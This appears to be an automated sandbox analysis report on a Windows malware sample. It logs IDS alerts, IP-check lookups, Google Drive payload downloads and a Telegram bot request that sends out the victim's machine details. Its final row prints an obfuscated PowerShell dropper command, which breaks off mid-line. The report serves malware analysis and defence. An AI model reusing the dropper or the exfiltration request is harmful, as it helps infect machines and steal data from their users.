| Source | Finding |
| --- | --- |
| global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org |
| global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org |
| global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org |
| global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org |
| global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive |
| Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49982 -> 193.122.6.168:80 |
| Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49979 -> 193.122.6.168:80 |
| Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49987 -> 188.114.96.3:443 |
| Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49983 -> 188.114.96.3:443 |
| Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49981 -> 188.114.96.3:443 |
| Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49991 -> 188.114.96.3:443 |
| Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49970 -> 142.250.185.206:443 |
| global traffic | HTTP traffic detected: GET /uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET /download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.usercontent.google.com Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET /uc?export=download&id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache |
| global traffic | HTTP traffic detected: GET /download?id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org |
| global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org |
| global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org |
| global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive |
| global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive |

| Source | Finding |
| --- | --- |
| powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.google.com |
| powershell.exe, 00000002.00000002.1497034651.0000028F56895000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.usercontent.google.com |
| powershell.exe, 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
| powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
| powershell.exe, 00000002.00000002.1497034651.0000028F54AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1688588153.00000000044B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
| powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
| powershell.exe, 00000002.00000002.1497034651.0000028F54AE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
| powershell.exe, 00000005.00000002.1688588153.00000000044B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB |
| powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com |
| msiexec.exe, 00000007.00000002.2618677308.00000000253A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en |
| msiexec.exe, 00000007.00000002.2618677308.00000000253A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en8 |
| msiexec.exe, 00000007.00000002.2618677308.00000000253AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
| powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
| powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
| powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
| powershell.exe, 00000002.00000002.1497034651.0000028F56857000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.googP |
| powershell.exe, 00000002.00000002.1497034651.0000028F54D07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F56857000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com |
| powershell.exe, 00000002.00000002.1497034651.0000028F54D07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCyP |
| powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCyXR |
| powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.googh |
| powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F77000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com |
| powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F77000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1q2SN6d6sfcOEexG19WaNLkwAtt4X_kCy&export=download |
| powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
| powershell.exe, 00000002.00000002.1497034651.0000028F55712000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
| powershell.exe, 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
| powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com |
| powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri |
| powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com |
| powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com |
| powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49985 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49983 |
| unknown | Network traffic detected: HTTP traffic on port 49995 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49970 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49740 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49981 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49980 |
| unknown | Network traffic detected: HTTP traffic on port 49989 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49746 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49980 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49977 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49977 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49996 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49995 |
| unknown | Network traffic detected: HTTP traffic on port 49996 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49993 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49970 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49991 |
| unknown | Network traffic detected: HTTP traffic on port 49740 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49985 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49987 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49983 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49981 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49991 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49993 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49989 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49746 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49987 |
| amsi32_1516.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
| Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
| Process Memory Space: powershell.exe PID: 1516, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
| C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselv |